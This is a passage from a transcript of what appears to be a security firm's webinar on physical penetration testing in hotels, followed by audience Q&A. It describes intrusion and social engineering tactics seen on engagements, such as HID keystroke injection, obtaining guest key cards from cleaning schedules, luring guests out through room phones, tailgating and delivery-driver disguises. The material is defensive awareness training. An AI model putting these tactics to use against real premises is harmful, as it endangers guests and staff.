- 30:30 - 31:00 building cover stories for social engineering by reading files that are easily accessible. Now, a question to ask yourself is how much data can an attacker gain if they were to walk into your offices? And I can imagine that most people that get asked that question will be saying a lot of data. So, it's always important to ensure that doors are triple checked at the end of a shift or in less busy hours. So,
- 31:00 - 31:30 we'll move on to vulnerable entry points. So, not only is this internal offices that we were just talking about, but also entry points on the exterior of buildings as well. So when we're on site, we think as an attacker, and one of our main focuses is gaining entry into the premises if we were not a guest at the hotel. Once an attacker's inside, they can move freely into restricted areas. So we also look for things like CCTV blind spots, just to simulate an attack where our team can get in and out
- 31:30 - 32:00 without detection. So, it's imperative to ensure that your fortress is essentially bulletproof and that extra precautions are taken into considering what you do during off peak hours. Again, another one is the passwords stored in notebooks here, and human habits play a massive role in this as well. We're in a culture where we're taught to update our passwords as often as we can. And with constantly changing
- 32:00 - 32:30 passwords, we tend to start writing these down in areas that we can refer back to. And attackers know this. They will exploit these habits to access your machines and accounts. It doesn't finish with just passwords as well. We find bank details, PIN numbers, you name it. It's all written in the back of the same places. And the vast majority of people write down their sensitive information. And I will hold my hand up. Before I was in cyber security, I was one to do this. I'd flip back to the back of my notepad and write all of my
- 32:30 - 33:00 information there. And I'm sure many people do too, which is what we're finding on these engagements. So, it's time to make the change and start rolling out these practices to ensure that staff members in the hotel are also not doing this, because this is what we're finding during attacks. Now, this is a sight that we see, albeit these aren't real images that we've taken from some of our engagements. This is a stock image, but we're seeing this far too often. This is another example
- 33:00 - 33:30 of human error at play. When staff drawers are left unlocked, it's easy for attackers to access sensitive documents, credentials, again, personal information. Even something as simple as leaving a drawer open can open the door to bigger security breaches. If we manage to enter a restricted area, we can further our attack by accessing drawers where staff leave them unlocked. This is usually where the most critical findings surface. So in the image, you can see that the keys are left in these
- 33:30 - 34:00 drawers and it's a regular mistake. We again see it time and time again on engagements. So even if the drawers are locked, the keys are left in them, which makes it very easy for our team to exfiltrate data. A lack of clean desk policy is another common vulnerability. When staff leave confidential material, documents or personal information out on the desk, it creates an opportunity for an attacker to gather sensitive data. The clean desk policy ensures that sensitive information is locked away or
- 34:00 - 34:30 secured when not in use. So for us, desks are usually a gold mine for sensitive data, and it's one of the easiest ways for an attacker to gather intelligence to escalate whilst we're on site. Machine USB ports not being disabled. With offices pretty much covered in the previous points, we can move on to more machine-based attacks here. So USB ports
- 34:30 - 35:00 on machines are often left unsecured, and that allows attackers to use USB based attacks like running malicious payloads or plugging in HID devices. So once an attacker has physical access to a device, we often find that these ports aren't disabled on machines that don't actually need them, and it leaves the door open for a lot of problems. This is something that your IT department would usually manage using group policy on the domain, and essentially you can disable all machine
- 35:00 - 35:30 USB ports that aren't needed. Guest elevators that allow attackers to easily access multiple floors create an opportunity for them to perform reconnaissance and gather intel without being detected. If an attacker can access areas that they shouldn't be able to, they can exploit those entry points to launch attacks. In the past, we've actually used this type of access to enter through fire exits to
- 35:30 - 36:00 off-limit floors, and it makes it a lot easier to maneuver through the hotel floors. So, access to a basement is obviously far easier for an attacker from floor one rather than going from floor 12 and going down fire exits. So having access to other floors can also lead to guest rooms being accessed as well, and also finding other off-limit areas such as cleaning staff rooms and smaller offices that you shouldn't
- 36:00 - 36:30 be able to find if you're not on that floor. At the reception desk, we also find a lot of sensitive guest information left out in the open, either on paper or on screens. And if an attacker has access to this data, they can use it for identity theft, fraud, or more targeted attacks on specific guests at the hotel. Whilst we're on the subject of reception desks, the team have noticed a regular occurrence of receptionists leaving their posts and leaving machines
- 36:30 - 37:00 unlocked, making it easier for us to again plug in devices that can shell a machine. This makes it insanely easy for a remote access Trojan to be placed on the machine with human interface devices. So we can use keystroke injection from a completely different location inside the hotel. So yeah, the data being left on display on reception desks is almost as
- 37:00 - 37:30 important as them being left unlocked and abandoned. So, reception desks are one of the main important areas that we look at when on engagements to see how the staff are acting whilst we're watching them. Cleaning carts. Now, this is a unique one. Cleaning carts sometimes contain guest information like names, room numbers, and checkout dates. These are actually on physical cleaning
- 37:30 - 38:00 schedules which can easily be accessed by an attacker. These carts are often left unattended in public spaces, providing a prime opportunity for data exfiltration. So in the past attacks we've carried out, the black teamers at Threat Spike have used this data to request room key cards for specific guests. As these attacks are a proof of concept, we wouldn't access guest rooms. However, the lack of verification would allow an attacker to enter a room with malicious intent. And as a bonus finding
- 38:00 - 38:30 that isn't actually noted in these slides, our team have also discovered that internal room phones can call other hotel rooms, which allows for impersonation of hotel staff. So this vector can lure guests from their rooms to attend reception, leaving their rooms unoccupied, which chains attack methodologies together to create a critical finding. We can lure guests out of their rooms. If we have their key card, we can open the door and access personal belongings. And if there are laptops or machines in there that we can
- 38:30 - 39:00 take and get data from. Slow closing doors that don't automatically latch can make it easier for attackers to tailgate behind employees and gain access to secure areas. Tailgating is one of the easiest ways for attackers to bypass physical security, and slow closing doors make it even easier. I won't go into too much detail with this common attack vector, but it's often forgotten when looking at physical security. And this type of
- 39:00 - 39:30 bypass is one of the most popular that is exploited by malicious actors. It's often forgotten. I've seen far too many times slow doors taking 20 seconds to shut, and it gives an attacker ample time to grab the door before it closes or latches and walk into a room or walk into a restricted area. Staff networks that aren't hidden or encrypted properly create opportunities for attackers too. They can join a
- 39:30 - 40:00 network, especially if it's not protected by strong authentication. So by infiltrating staff networks, attackers can access sensitive data and systems that shouldn't be exposed. If your network is not hidden, it's important to ensure that a secure password is used. We're seeing during our engagements that a lot of passwords can be easily guessed or used in a custom word list that would be used in a brute force attack. So, it's probably wise to review these passwords used on staff
- 40:00 - 40:30 networks to ensure that they aren't guessable. Now, I believe that kitchen access is overlooked most of the time, but the kitchen is another area that can be vulnerable to attack. It's not just about food safety. It's unrestricted access that could lead to contamination attacks where malicious actors can introduce harmful substances or alter food orders.
- 40:30 - 41:00 Additionally, sensitive operational information can also be accessed if security isn't tight enough. And understandably, if you have access to that sort of data or if you have access to the kitchen, you can actually create a bad reputation for that company or that hotel chain, if there was like a poisoning attack. Guest machines, like the ones in business centers, often don't
- 41:00 - 41:30 reset sessions after use, leaving sensitive guest data exposed. So when the next user sits down, they can see all of the sessions, anything that the last user downloaded. And it will all be on that system locally. If an attacker gains access to these systems, they can harvest the guest data or login credentials or even financial information. But guest machines are one of the first places I look during an engagement, as downloaded files can be accessed, account credentials could be
- 41:30 - 42:00 saved, and sessions can be used for users that never logged out. So to implement a session reset on the executive guest machines is something that should be a priority. Now, we've covered some of the basic attacks found on engagements, and I just want to talk about social engineering. So, attackers are experts at exploiting human behavior. They target busy environments such as hotels, the
- 42:00 - 42:30 front desk or the back of house areas where employees might not be paying attention. So, they'll use urgency, deception, or manipulation to gain access to restricted areas or sensitive information. And we'll scoot over some reasons why hotels are easy targets for social engineering attacks. So, hotels, as you know, are fast-paced environments, and attackers know that, too. By taking advantage of
- 42:30 - 43:00 distractions or moments where employees are overworked or overwhelmed, they can slip under the radar and execute their attacks. And social engineering thrives in these environments. So being aware of how attackers can exploit them is crucial for your security. So an attacker could, for example, claim that they're from an IT department and urgently get access to hotel systems. If the staff members aren't trained, they can be easily exploited in these scenarios.
- 43:00 - 43:30 So again, untrained or overwhelmed employees are prime targets for social engineering attacks, and attackers exploit the fact that these employees may not have the right training to recognize a scam or a malicious request. So what we're also seeing as well is when there's an employee in training, they'll wear training badges and they will be the main target for our social engineering attacks because they're new and they haven't been exposed to this sort of training in their early stages
- 43:30 - 44:00 of working for the hotel. So training your staff to recognize social engineering attacks is one of the best ways to defend against them. It's not enough just to have the right physical security measures in place. You actually need to make sure your staff know how to spot potential threats and respond appropriately. So implementing scenario-based training, like conducting regular drills and simulations that mirror real life social
- 44:00 - 44:30 engineering attacks, would really help them build an understanding of what to spot when they are on shift. So it's almost like promoting a "see something, say something" culture. So creating a security conscious culture where employees feel comfortable reporting suspicious activity is key. A culture like this helps ensure that threats are identified and acted on before they escalate. And nine
- 44:30 - 45:00 times out of 10 when we are on an engagement and we have to use our letter of engagement because we have been burnt or we've been compromised, it is because the staff have proactively reported suspicious activity to the relevant people in the organization, and that's when we are questioned. So it all comes down to the staff and how they respond when seeing something that looks suspicious.
- 45:00 - 45:30 So to wrap up, let's talk about improving your hotel's security posture. We'll look at how you can strengthen security training, physical controls, data protection measures, and more to keep your hotel secure. So comprehensive security training for staff is essential. It's one of the most effective ways to protect your hotel, and staff should be equipped with the right knowledge to identify and respond to security threats. So this includes training on
- 45:30 - 46:00 everything from recognizing phishing attempts to handling sensitive information properly. I always say that staff are the biggest weakness on engagements and they are often the most targeted. So by strengthening physical security measures like access control or surveillance and monitoring, you can better protect your hotel against unauthorized access and ensure that only authorized personnel have access to
- 46:00 - 46:30 restricted areas. So, it's definitely important to be having ample coverage of CCTV cameras, motion sensors, but not only that, it's also important to have someone that services this footage as well, that is actively monitoring CCTV. It's all good having cameras set up, but if there's no one there to spot suspicious activity, then they become redundant. Again, when we're on site, we notice that there's CCTV. However, no one's monitoring that CCTV,
- 46:30 - 47:00 so we can get away with carrying out attacks for hours before we are questioned. And that's just because no one is reviewing this footage, and usually the head of security is engrossed in other things at the time just because their workload becomes too hectic later on on a night shift. Implementing and improving data protection means encrypting sensitive guest information, securing payment systems, and ensuring that data is only
- 47:00 - 47:30 accessible to those who need it. So, we know that strong data protection is vital for maintaining the trust of your guests. So, limiting the amount of sensitive data collected and stored essentially reduces the potential impact of a breach. So it's worth questioning if storing sensitive information like passports is required for over a certain time frame. So would they be deleted after 3 months? Does it need to be stored? It would be a wise idea to
- 47:30 - 48:00 review those processes to not continuously store that information for the long term. Now, regular pen testing and vulnerability assessments help you stay ahead of potential threats. By continuously testing your systems and security measures, you can identify weaknesses and patch them before attackers get a chance to exploit them. So, at Threat Spike, we have over a decade of experience in exploiting
- 48:00 - 48:30 vulnerabilities, and we know what to look for when it comes to ensuring your premises is secure. So it's vital to utilize a company that can give you a detailed report into your security flaws. So obviously shameless plug, but if you would like help in discussing these vulnerabilities, then please reach out and we'll be more than happy to assist. Now, real world stories. I'm just looking at the time here. I've outlined some of our specific attacks and would
- 48:30 - 49:00 love to go into detail on how we can leverage multiple vulnerabilities to get a foothold on a network to exploit an organization, but I'm going to speak to Adam and put these on another webinar. Otherwise, we're going to run massively over time. But I will speak with Adam and see if we can arrange a part two to physical penetration testing if this has gone down well today. But to add value, I'm going to open up my inbox where I'll answer questions in as much detail as possible. So, if there are recurring questions, I can include these in a Q&A
- 49:00 - 49:30 session that will allow the whole of the Threat Spike team as much depth as possible. Fantastic. Thank you so much, Kurt. That was really good. And I do think it'll be amazing to actually see the real world case studies. I for one would love to see you wear a GoPro on some of these. So we can hope for that in the future. So there's been a couple of questions that have been raised during the session. I'll take the first one. So the first
- 49:30 - 50:00 question is how does hospitality differ from other sectors in terms of the difficulties that are faced, and would you say it's easier or harder and why? So I would definitely say that hospitality is very different to other sectors. Okay. I'd say it's far harder to secure hospitality, and the main reason for that is that there is just so much attack surface. There are so many exposed elements of the business.
- 50:00 - 50:30 If I give you an example, so I used to work as a consultant, and if I had ever received an email from somebody who wasn't my direct customer or my line manager or somebody like this, then I would think it was incredibly strange. But in hospitality, you are getting emails every single day from everywhere, you know. They could come from Gmail accounts. They could come from Yahoo, AOL, even places
- 50:30 - 51:00 like GMX, you know, because people value their privacy and their anonymity. And so, it's incredibly difficult to screen out what are actual legitimate security threats and, you know, what is just normal guest activity really. And I think it's a very complicated ecosystem having to work with so many different partners through so many different applications. I think a lot of the different vendors within hospitality don't make it easy to spot
- 51:00 - 51:30 suspicious emails because they put their information, and this could be things like bids, where hotels will get bid requests. These things come in all kinds of different formats, and it can be, again, you know, how is anybody really, as an employee, unless they've worked in hospitality for a very long time, supposed to actually discern what is a legitimate email versus what is somebody trying to coerce them into a phish? And so that as
- 51:30 - 52:00 well as the physical side of things, I think as well many companies will protect themselves with physical barriers, physical security controls, and for hotels, quite frankly, that's ugly, right? So, it needs to be a soft, welcoming environment. Staff need to be operating in a very welcoming way towards guests. So, the last thing you can do is put any kind of physical defense up in place, you know. So it makes it very difficult, and I think all of these kind of things coupled with the lower budget that
- 52:00 - 52:30 hospitality clients tend to have due to the, you know, the high cost, high competition that exists within hospitality. It makes it very hard to obviously go out there and splurge on lots and lots of different potential solutions and see what works and overstaff things and things like this, all the kind of things that, say, a financial services company might do. So yeah, I genuinely think that hospitality is very, very targeted. We see
- 52:30 - 53:00 things that affect hospitality much earlier than other industries, and then we see those kind of things ripple across into the other industries in which we provide our protection for, and I think that it's a very difficult environment to protect. So then the second question, I think this is one for Kurt. How do you spot a bad actor who is physically on site? So the answer is you can't. It's
- 53:00 - 53:30 very difficult. There's a lot of recon that goes into pulling off an attack, and we aim to blend in. It would be very hard for an attacker to look like an attacker and attend a premises and carry out an attack. They have to blend in. They have to carry out the attack flawlessly. So again, this falls down to how your staff react in certain scenarios. If they see something suspicious, then how are they going to
- 53:30 - 54:00 raise it? Who are they raising it to? What's the process or the protocol when something suspicious is raised? It's also about having these physical security implementations in place that can prevent a threat actor from taking over an organization. So it's a mix of stuff that needs to be done. It's not just one thing that I can give you that kind of points out a
- 54:00 - 54:30 threat actor and what they look like. But I'll give you an example. We would dress up as a DPD delivery driver to bypass an entry point like a reception desk and go into the building, and then once we're in the building we can then leverage the machines that are in there. We can then look at sensitive information. So you're not going to be suspicious of every DPD driver that attends the premises. So again, it's about training staff and
- 54:30 - 55:00 them having awareness of what suspicious activity looks like, and training should regularly be implemented on that, as well as implementing all security measures that you possibly can. All right, perfect. Thank you very much, Kurt. All right, well we want to thank everybody for attending this webinar. As I mentioned before, this is going to be a series throughout the year. We're aiming to deliver these quarterly and take people through all the new things that we've been seeing throughout the year. We'll be sending out this
- 55:00 - 55:30 webinar as well as a video after the session. If you ever have any questions, feel free to reach out to us directly or email [email protected]. Thank you very much.